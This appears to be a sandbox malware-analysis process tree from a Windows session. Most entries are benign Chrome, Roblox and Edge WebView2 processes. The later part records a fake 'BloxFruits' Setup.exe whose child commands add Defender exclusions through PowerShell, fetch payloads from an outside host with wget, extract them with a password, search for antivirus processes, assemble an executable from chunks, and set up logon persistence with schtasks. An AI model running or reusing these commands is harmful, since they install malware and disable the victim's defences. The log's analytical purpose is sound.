  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --field-trial-handle=7996,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7840 /prefetch:1
  2⤵
  PID:5656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --field-trial-handle=7764,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7752 /prefetch:1
  2⤵
  PID:5352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --field-trial-handle=8136,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8128 /prefetch:1
  2⤵
  PID:5124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --field-trial-handle=7936,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:3820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7056,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:8
  2⤵
  PID:4584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7012,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7380 /prefetch:8
  2⤵
  PID:2456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7972,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5232 /prefetch:8
  2⤵
  PID:312
- C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe
  "C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Enumerates system info in registry
  - Modifies Internet Explorer settings
  PID:5296
- - C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe
    MicrosoftEdgeWebview2Setup.exe /silent /install
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:4400
  - - C:\Program Files (x86)\Microsoft\Temp\EUD79A.tmp\MicrosoftEdgeUpdate.exe
      "C:\Program Files (x86)\Microsoft\Temp\EUD79A.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
      4⤵
      Event Triggered Execution: Image File Execution Options Injection
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Checks system information in the registry
      System Location Discovery: System Language Discovery
      PID:5444
    - - C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5188
    - - C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1508
      - C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:4036
      - C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:1984
      - C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:4720
    - - C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NzQ0OTE0MTYtQzM0OC00OEEzLThFQTItNjZCMDdBMDdBRThFfSIgdXNlcmlkPSJ7NkIzQjRBRjMtOTQ0OC00RDkzLUI1NzctMTRGNUFCM0U4NjcwfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntFNDM2NTcxQy00MTdELTRDN0MtOEVEQy00RjJCNjQ5NTZCQUF9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iIi8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNDcuMzciIG5leHR2ZXJzaW9uPSIxLjMuMTcxLjM5IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNDc2NjI0NjIyMyIgaW5zdGFsbF90aW1lX21zPSI1MDIiLz48L2FwcD48L3JlcXVlc3Q-
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks system information in the registry
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1220
    - - C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{74491416-C348-48A3-8EA2-66B07A07AE8E}" /silent
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5888
- - C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe
    "C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe" -app -clientLaunchTimeEpochMs 0 -isInstallerLaunch 5296
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of UnmapMainImage
    PID:5424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --field-trial-handle=5112,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8116 /prefetch:1
  2⤵
  PID:5616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5916,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3596 /prefetch:8
  2⤵
  PID:4884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6188,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7448 /prefetch:8
  2⤵
  PID:4924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7732,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5840 /prefetch:8
  2⤵
  PID:1508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5992,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6620 /prefetch:8
  2⤵
  PID:5000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7400,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7664 /prefetch:8
  2⤵
  PID:3768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7316,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6988 /prefetch:8
  2⤵
  PID:5136
- C:\Users\Admin\Downloads\RobloxPlayerInstaller (1).exe
  "C:\Users\Admin\Downloads\RobloxPlayerInstaller (1).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Enumerates system info in registry
  PID:4072
- C:\Users\Admin\Downloads\RobloxPlayerInstaller (1).exe
  "C:\Users\Admin\Downloads\RobloxPlayerInstaller (1).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Enumerates system info in registry
  PID:6104
- C:\Users\Admin\Downloads\RobloxPlayerInstaller (1).exe
  "C:\Users\Admin\Downloads\RobloxPlayerInstaller (1).exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - System Location Discovery: System Language Discovery
  - Enumerates system info in registry
  - Modifies Internet Explorer settings
  PID:4460
- - C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe
    "C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe" -app -clientLaunchTimeEpochMs 0 -isInstallerLaunch 4460
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of UnmapMainImage
    PID:6064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --field-trial-handle=5488,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7284 /prefetch:1
  2⤵
  PID:628
- C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe
  "C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe" roblox-player:1+launchmode:play+gameinfo:hypq2_yR425qyPhqE_JHXkSbq27IrGAuCXl2XdlbURkJ8U2CN0a6JqLfXLHQ74HvSpnXZjjRcqWYNLDZPMkWJCiRtoBIZNtYd0adlrMkFWDL9L0qpXQXotYh_VCVvwKckQMYfR6ALT2zPN3aVrAVakxLJdTOlfrTtsw8tThd0bBJFr3Ob436AtNE8bGLWiUSTefM57ErebvghyjxOzCNqaqsVTqcGER5M-RS1Diohm8+launchtime:1736951066051+placelauncherurl:https%3A%2F%2Fwww.roblox.com%2FGame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3D1736950905545005%26placeId%3D2753915549%26isPlayTogetherGame%3Dfalse%26referredByPlayerId%3D0%26joinAttemptId%3D6e5d42b1-c8d3-43d6-8ac6-463a1917d7bf%26joinAttemptOrigin%3DPlayButton+browsertrackerid:1736950905545005+robloxLocale:en_us+gameLocale:en_us+channel:zbeta+LaunchExp:InApp
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of UnmapMainImage
  PID:2184
- C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe
  "C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe" roblox-player:1+launchmode:play+gameinfo:2jr2bJUjN_O9aE_OelRzBUHvwMUeI1kysvzD-bCq73D61LnynkgTVqC6vuNMoPgezSs29DHHGra-rd8VVWxdiU8C3fiD4fUH-yTjAWIHytjV8PSlUiBClOKKMIZ5T8MtUHIgzYqDU-Xpzm9cLDXI8uT5b5Cg2xw8TcdGKtAbkuQBUlEl9jVQvsKzd0WDMc9fo8O1ruL6r1OTSIARYFbjjDP2M6V4FAxlOTiLAZTkLi8+launchtime:1736951066051+placelauncherurl:https%3A%2F%2Fwww.roblox.com%2FGame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3D1736950905545005%26placeId%3D2753915549%26isPlayTogetherGame%3Dfalse%26referredByPlayerId%3D0%26joinAttemptId%3D6e5d42b1-c8d3-43d6-8ac6-463a1917d7bf%26joinAttemptOrigin%3DPlayButton+browsertrackerid:1736950905545005+robloxLocale:en_us+gameLocale:en_us+channel:zbeta+LaunchExp:InApp
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --field-trial-handle=5804,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4596 /prefetch:1
  2⤵
  PID:1604
- C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe
  "C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe" roblox-player:1+launchmode:play+gameinfo:SaZnlVjvyXkuuKdwTTn3s5tUoOMUa1HO_1yQ_cmHDBOrnOkdVDOIDt66nhsmv-jcjV86u_o4uzWkakWkeJUkM4rLhMdkyqW_VpZBWYd-f9B6Z4RpYgIg2NM9wcZqOtz9NpIQLqHxdavGNaKTZl36VAwIChDPtOc9xJ9xbfEiPFERNKZIHr6Vvw6O6OjuC-jUN6bUHRs52u59pgqyixayQpTgjSa0JUqUbQgjSoXBzPg+launchtime:1736951066051+placelauncherurl:https%3A%2F%2Fwww.roblox.com%2FGame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3D1736950905545005%26placeId%3D2753915549%26isPlayTogetherGame%3Dfalse%26referredByPlayerId%3D0%26joinAttemptId%3D6e5d42b1-c8d3-43d6-8ac6-463a1917d7bf%26joinAttemptOrigin%3DPlayButton+browsertrackerid:1736950905545005+robloxLocale:en_us+gameLocale:en_us+channel:zbeta+LaunchExp:InApp
  2⤵
  - Executes dropped EXE
  PID:5316

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5328

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\0b6ce2df1a5c46b3aa91f6ac509d85fc /t 6016 /p 2356
1⤵
PID:412

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap21910:82:7zEvent14203
1⤵
PID:5888

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap8177:82:7zEvent14248
1⤵
PID:748

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\BloxFruits\" -ad -an -ai#7zMap5504:82:7zEvent23919
1⤵
PID:5644

C:\Users\Admin\Downloads\BloxFruits\Setup.exe
"C:\Users\Admin\Downloads\BloxFruits\Setup.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:USERPROFILE, $env:ProgramData, $env:SystemDrive\\"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3248
- C:\Users\Admin\AppData\Local\Temp\wget.exe
  "C:\Users\Admin\AppData\Local\Temp\wget.exe" ping --content-disposition https://buscocurro.com/21/7055475115 -P C:\Users\Admin\AppData\Local\Temp
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4788
- C:\Users\Admin\AppData\Local\Temp\winrar.exe
  "C:\Users\Admin\AppData\Local\Temp\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Local\Temp\01*.* C:\Users\Admin\AppData\Local\Temp
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4908
- C:\Users\Admin\AppData\Local\Temp\11025900
  C:\Users\Admin\AppData\Local\Temp\11025900
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  PID:5804
- C:\Users\Admin\AppData\Local\Temp\wget.exe
  "C:\Users\Admin\AppData\Local\Temp\wget.exe" ping --content-disposition https://buscocurro.com/22/5334240198 -P C:\Users\Admin\AppData\Local\Temp
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1104
- C:\Users\Admin\AppData\Local\Temp\winrar.exe
  "C:\Users\Admin\AppData\Local\Temp\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Local\Temp\02*.* C:\Users\Admin\AppData\Local\Temp
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5156
- C:\Users\Admin\AppData\Local\Temp\22040691
  C:\Users\Admin\AppData\Local\Temp\22040691
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5140
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy Monitored Monitored.cmd && Monitored.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5304

C:\Users\Admin\Downloads\BloxFruits\Setup.exe
"C:\Users\Admin\Downloads\BloxFruits\Setup.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:USERPROFILE, $env:ProgramData, $env:SystemDrive\\"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4372
- C:\Users\Admin\AppData\Local\Temp\wget.exe
  "C:\Users\Admin\AppData\Local\Temp\wget.exe" ping --content-disposition https://buscocurro.com/21/7055475115 -P C:\Users\Admin\AppData\Local\Temp
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6020
- C:\Users\Admin\AppData\Local\Temp\winrar.exe
  "C:\Users\Admin\AppData\Local\Temp\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Local\Temp\01*.* C:\Users\Admin\AppData\Local\Temp
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5848
- C:\Users\Admin\AppData\Local\Temp\11025900
  C:\Users\Admin\AppData\Local\Temp\11025900
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  PID:4220
- C:\Users\Admin\AppData\Local\Temp\wget.exe
  "C:\Users\Admin\AppData\Local\Temp\wget.exe" ping --content-disposition https://buscocurro.com/22/5334240198 -P C:\Users\Admin\AppData\Local\Temp
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3812
- C:\Users\Admin\AppData\Local\Temp\winrar.exe
  "C:\Users\Admin\AppData\Local\Temp\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Local\Temp\02*.* C:\Users\Admin\AppData\Local\Temp
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3772
- C:\Users\Admin\AppData\Local\Temp\22040691
  C:\Users\Admin\AppData\Local\Temp\22040691
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  PID:5832
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy Monitored Monitored.cmd && Monitored.cmd
    3⤵
    PID:4052
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:6108
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa opssvc"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4340
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:2148
  - - C:\Windows\SysWOW64\findstr.exe
      findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3948
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 751505
      4⤵
      System Location Discovery: System Language Discovery
      PID:5804
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "EntriesLiftTonerViiCoxDriverGraphsRepublic" Town
      4⤵
      System Location Discovery: System Language Discovery
      PID:1280
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b ..\Offline + ..\Forgot + ..\Refused + ..\Inside + ..\Extreme + ..\Mason + ..\Session + ..\Ambient k
      4⤵
      System Location Discovery: System Language Discovery
      PID:4432
  - - C:\Users\Admin\AppData\Local\Temp\751505\Ide.com
      Ide.com k
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:3652
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "EchoSphere" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EchoCraft Dynamics\EchoSphere.js'" /sc onlogon /F /RL HIGHEST
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4884
    - - C:\Users\Admin\AppData\Local\Temp\10000020101\c4652134bb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000020101\c4652134bb.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:5216
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Arkansas Arkansas.cmd && Arkansas.cmd
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5128
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:5900
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4244
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:3296
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3264
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 260766
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3604
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "SympathyLibertySightDefectsEndsParticularDrawingsPhysiology" Papua
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4940
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Christ + ..\Abraham + ..\Clicking + ..\Ibm + ..\Also + ..\Cambodia + ..\Belgium + ..\Xml + ..\Peterson + ..\Spot + ..\Carry I
        7⤵
        
        PID:4120
        
        C:\Users\Admin\AppData\Local\Temp\260766\Officials.com
        
        Officials.com I
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2896
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks.exe /create /tn "CryptoMindTechPro360X" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CryptoTechMind360 Elite Innovations Co\CryptoMindTechPro360X.js'" /sc onlogon /F /RL HIGHEST
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5516
        
        C:\Users\Admin\AppData\Local\Temp\260766\Officials.com
        
        C:\Users\Admin\AppData\Local\Temp\260766\Officials.com
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1720
        
        C:\Windows\system32\dwm.exe
        
        dwm.exe
        9⤵
        
        PID:5200
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 15
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5540
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\10000030111\31079771dc.dll, Main
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:4028
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 604
        6⤵
        Program crash
        
        PID:2372
  - - C:\Windows\SysWOW64\choice.exe
      choice /d y /t 15
      4⤵
      PID:1424

C:\Windows\SysWOW64\WerFault.exe
